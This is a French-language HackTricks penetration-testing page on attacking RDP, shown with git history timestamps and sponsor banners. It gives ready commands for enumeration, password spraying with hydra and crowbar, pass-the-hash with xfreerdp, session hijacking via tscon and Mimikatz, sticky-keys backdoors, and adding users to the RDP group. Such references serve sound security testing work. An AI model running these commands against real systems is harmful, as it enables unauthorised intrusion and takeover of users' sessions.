hacktricks/network-services-pentesting/pentesting-rdp.md

160 lines
10 KiB
Markdown
Raw Normal View History

2022-05-01 13:25:53 +00:00
# 3389 - Pentesting RDP
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 13:10:46 +00:00
* Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
2023-06-03 13:10:46 +00:00
[**DragonJAR Security Conference est un événement international de cybersécurité**](https://www.dragonjarcon.org/) avec plus d'une décennie d'existence qui se tiendra les 7 et 8 septembre 2023 à Bogotá, en Colombie. C'est un événement de contenu technique de haut niveau où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\
Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence !:
{% embed url="https://www.dragonjarcon.org/" %}
2023-06-03 13:10:46 +00:00
## Informations de base
2022-04-28 16:01:33 +00:00
2023-06-03 13:10:46 +00:00
Le protocole **Remote Desktop** (**RDP**) est un protocole propriétaire développé par Microsoft, qui fournit à un utilisateur une interface graphique pour se connecter à un autre ordinateur via une connexion réseau. L'utilisateur utilise un logiciel client **RDP** à cette fin, tandis que l'autre ordinateur doit exécuter un logiciel serveur **RDP** (à partir de [ici](https://en.wikipedia.org/wiki/Remote\_Desktop\_Protocol)).
2023-06-03 13:10:46 +00:00
**Port par défaut :** 3389
2022-05-01 13:25:53 +00:00
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
2023-06-03 13:10:46 +00:00
## Énumération
2023-06-03 13:10:46 +00:00
### Automatique
```bash
2022-10-03 20:20:19 +00:00
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
```
2023-06-03 13:10:46 +00:00
Il vérifie les cryptages disponibles et les vulnérabilités DoS (sans causer de DoS au service) et obtient des informations Windows NTLM (versions).
2022-10-03 20:20:19 +00:00
2022-05-01 13:25:53 +00:00
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rdp)
2023-06-03 13:10:46 +00:00
**Attention, vous pourriez verrouiller des comptes**
2022-10-03 20:20:19 +00:00
### **Password Spraying**
2023-06-03 13:10:46 +00:00
**Attention, vous pourriez verrouiller des comptes**
```bash
2022-10-03 20:20:19 +00:00
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
2023-06-03 13:10:46 +00:00
### Se connecter avec des identifiants/hashes connus
```bash
2022-10-03 20:20:19 +00:00
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```
2023-06-03 13:10:46 +00:00
### Vérifier les identifiants connus contre les services RDP
2023-06-03 13:10:46 +00:00
rdp\_check.py d'impacket vous permet de vérifier si certains identifiants sont valides pour un service RDP :
```bash
2022-10-03 20:20:19 +00:00
rdp_check <domain>/<name>:<password>@<IP>
```
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
2023-06-03 13:10:46 +00:00
La **Conférence de sécurité DragonJAR** est un événement international de cybersécurité qui a plus d'une décennie et qui se tiendra les 7 et 8 septembre 2023 à Bogotá, en Colombie. C'est un événement de contenu technique de haut niveau où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\
Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence ! :
{% embed url="https://www.dragonjarcon.org/" %}
2023-06-03 13:10:46 +00:00
## **Attaques**
2022-10-03 20:20:19 +00:00
2023-06-03 13:10:46 +00:00
### Vol de session
2023-06-03 13:10:46 +00:00
Avec les **permissions SYSTEM**, vous pouvez accéder à n'importe quelle **session RDP ouverte par n'importe quel utilisateur** sans avoir besoin de connaître le mot de passe du propriétaire.
2023-06-03 13:10:46 +00:00
**Obtenir les sessions ouvertes :**
2022-05-01 13:25:53 +00:00
```
query user
```
2023-06-03 13:10:46 +00:00
**Accès à la session sélectionnée**
```bash
tscon <ID> /dest:<SESSIONNAME>
```
2023-06-03 13:10:46 +00:00
Maintenant, vous serez à l'intérieur de la session RDP sélectionnée et vous devrez vous faire passer pour un utilisateur en utilisant uniquement les outils et fonctionnalités de Windows.
2023-06-03 13:10:46 +00:00
**Important**: Lorsque vous accédez à une session RDP active, vous allez déconnecter l'utilisateur qui l'utilisait.
2023-06-03 13:10:46 +00:00
Vous pourriez obtenir des mots de passe en les extrayant du processus, mais cette méthode est beaucoup plus rapide et vous permet d'interagir avec les bureaux virtuels de l'utilisateur (mots de passe dans le bloc-notes sans être enregistrés sur le disque, autres sessions RDP ouvertes sur d'autres machines...)
2022-05-01 13:25:53 +00:00
#### **Mimikatz**
2023-06-03 13:10:46 +00:00
Vous pouvez également utiliser Mimikatz pour cela :
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
2022-10-03 20:20:19 +00:00
### Sticky-keys & Utilman
2023-06-03 13:10:46 +00:00
En combinant cette technique avec **stickykeys** ou **utilman**, vous pourrez accéder à une invite de commande administrative et à n'importe quelle session RDP à tout moment.
2023-06-03 13:10:46 +00:00
Vous pouvez rechercher des RDP qui ont déjà été compromis avec l'une de ces techniques en utilisant : [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
2023-06-03 13:10:46 +00:00
### Injection de processus RDP
2022-10-03 20:20:19 +00:00
2023-06-03 13:10:46 +00:00
Si quelqu'un d'un domaine différent ou avec des **privilèges supérieurs se connecte via RDP** sur le PC où **vous êtes un administrateur**, vous pouvez **injecter** votre balise dans son **processus de session RDP** et agir comme lui :
2022-08-16 00:18:24 +00:00
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
{% endcontent-ref %}
2023-06-03 13:10:46 +00:00
### Ajout d'un utilisateur au groupe RDP
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
2023-06-03 13:10:46 +00:00
## Attaque Shadow
2023-06-03 13:10:46 +00:00
**AutoRDPwn** est un framework de post-exploitation créé en Powershell, conçu principalement pour automatiser l'attaque **Shadow** sur les ordinateurs Microsoft Windows. Cette vulnérabilité (listée comme une fonctionnalité par Microsoft) permet à un attaquant distant de **voir le bureau de sa victime sans son consentement**, et même de le contrôler à la demande, en utilisant des outils natifs du système d'exploitation lui-même.
2022-10-03 20:20:19 +00:00
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
2023-06-03 13:10:46 +00:00
## Commandes automatiques HackTricks
2022-05-01 13:25:53 +00:00
```
2021-08-12 13:26:30 +00:00
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
2021-08-15 17:55:52 +00:00
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
2021-08-12 13:26:30 +00:00
```
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
2023-06-03 13:10:46 +00:00
[**DragonJAR Security Conference est un événement international de cybersécurité**](https://www.dragonjarcon.org/) qui a plus d'une décennie et qui se tiendra les 7 et 8 septembre 2023 à Bogotá, en Colombie. C'est un événement de contenu technique élevé où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\
Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence ! :
{% embed url="https://www.dragonjarcon.org/" %}
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 13:10:46 +00:00
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>